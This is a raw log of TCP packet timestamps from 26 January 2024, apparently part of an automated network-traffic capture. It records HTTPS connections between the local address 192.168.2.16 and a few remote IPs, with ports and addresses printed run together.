                                                                                                                                                                                    Jan 26, 2024 14:41:57.184511900 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.184533119 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.184536934 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.184573889 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.184577942 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185307980 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185345888 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185353041 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185359001 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185391903 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185395002 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185400009 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.185447931 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.186081886 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.231170893 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281275988 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281335115 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281392097 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281410933 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281605005 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281641960 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281644106 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281651974 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281682968 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.281687021 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.282354116 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.282382011 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.282387018 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.282392025 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.282418013 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.282422066 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.283180952 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.283206940 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.283210993 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.283216000 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.283248901 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.300426960 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.300468922 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.300496101 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.300503016 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.300534964 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.301122904 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.301434040 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.301609993 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.301649094 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.301708937 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.301748037 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.302560091 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.302598000 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303297043 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303345919 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303400993 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303438902 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303442955 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303520918 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:57.303555965 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.318003893 CET49799443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:57.318026066 CET44349799104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:59.323875904 CET44349761104.17.3.184192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:59.323950052 CET44349761104.17.3.184192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:59.324122906 CET49761443192.168.2.16104.17.3.184
                                                                                                                                                                                    Jan 26, 2024 14:41:59.852535963 CET49761443192.168.2.16104.17.3.184
                                                                                                                                                                                    Jan 26, 2024 14:41:59.852566004 CET44349761104.17.3.184192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.127732038 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.127765894 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.127834082 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.129364967 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.129376888 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.150540113 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.193907976 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.381751060 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.384490967 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.384506941 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.385066032 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.385380030 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.385454893 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.443190098 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498002052 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498148918 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498212099 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498238087 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498323917 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498387098 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498395920 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498476982 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498526096 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498533964 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498624086 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498667955 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498676062 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498758078 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498806000 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498812914 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.498971939 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499021053 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499028921 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499129057 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499172926 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499180079 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499764919 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:01.499820948 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.527503967 CET49798443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:01.527532101 CET44349798104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.435267925 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:09.435306072 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.435384035 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:09.438611984 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:09.438631058 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.439275026 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:09.485932112 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.694802999 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.695118904 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:09.695136070 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.696367979 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.696703911 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:09.697139025 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:09.743206978 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.571501970 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.571623087 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.571685076 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.573344946 CET49802443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.573360920 CET44349802104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.610795021 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.610835075 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.610919952 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.611498117 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.611511946 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.614768982 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.657943010 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.688128948 CET4971480192.168.2.1672.21.81.240
                                                                                                                                                                                    Jan 26, 2024 14:42:12.790740013 CET804971472.21.81.240192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.790803909 CET4971480192.168.2.1672.21.81.240
                                                                                                                                                                                    Jan 26, 2024 14:42:12.868360043 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.872865915 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.872879028 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.873357058 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.873680115 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.873768091 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.926246881 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.945538044 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.945799112 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:12.945882082 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.950042963 CET49807443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:12.950077057 CET44349807104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.014350891 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.061907053 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.390809059 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.390866041 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.390904903 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.390934944 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.391014099 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.391035080 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.391077995 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.391392946 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.391433954 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.391465902 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401302099 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401335001 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401360035 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401385069 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401410103 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401473999 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401483059 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401509047 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401545048 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401592970 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401596069 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401623011 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401659012 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401691914 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401694059 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401712894 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401745081 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401766062 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401798964 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401803970 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.401884079 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.509205103 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.509377956 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.509747982 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.509831905 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.509844065 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.509926081 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.510406017 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.510481119 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.510485888 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.510510921 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.510552883 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.510591030 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.511260033 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.511337996 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512054920 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512141943 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512145996 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512164116 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512228966 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512564898 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.512643099 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.513120890 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.513206959 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.513211966 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.513233900 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.513281107 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.513974905 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514048100 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514059067 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514131069 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514705896 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514776945 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514786005 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.514854908 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.515650988 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.515724897 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.515737057 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.515794039 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.516410112 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.516483068 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.517249107 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.517386913 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627676010 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627788067 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627875090 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627882004 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627907038 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627907038 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.627942085 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628578901 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628648043 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628658056 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628671885 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628704071 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628709078 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.628745079 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629412889 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629477978 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629482985 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629503965 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629522085 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629528046 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.629556894 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.630387068 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.630448103 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.630454063 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.630497932 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.631216049 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.631283998 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.631295919 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.631352901 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.631899118 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.631979942 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.632719994 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.632787943 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.632816076 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.632875919 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.633625031 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.633699894 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.634479046 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.634536028 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.634560108 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.634565115 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.634591103 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.634612083 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.635298014 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.635365009 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.636059046 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.636126041 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.636136055 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.636197090 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.636993885 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.637068033 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.637077093 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.637134075 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.638600111 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.638680935 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.639775991 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.639866114 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.639872074 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.641491890 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.641530991 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.641573906 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.641578913 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.641633034 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.642308950 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.642385960 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.642405987 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.642632008 CET44349809104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:42:13.642697096 CET49809443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:42:13.655071974 CET49809443192.168.2.16104.21.79.9
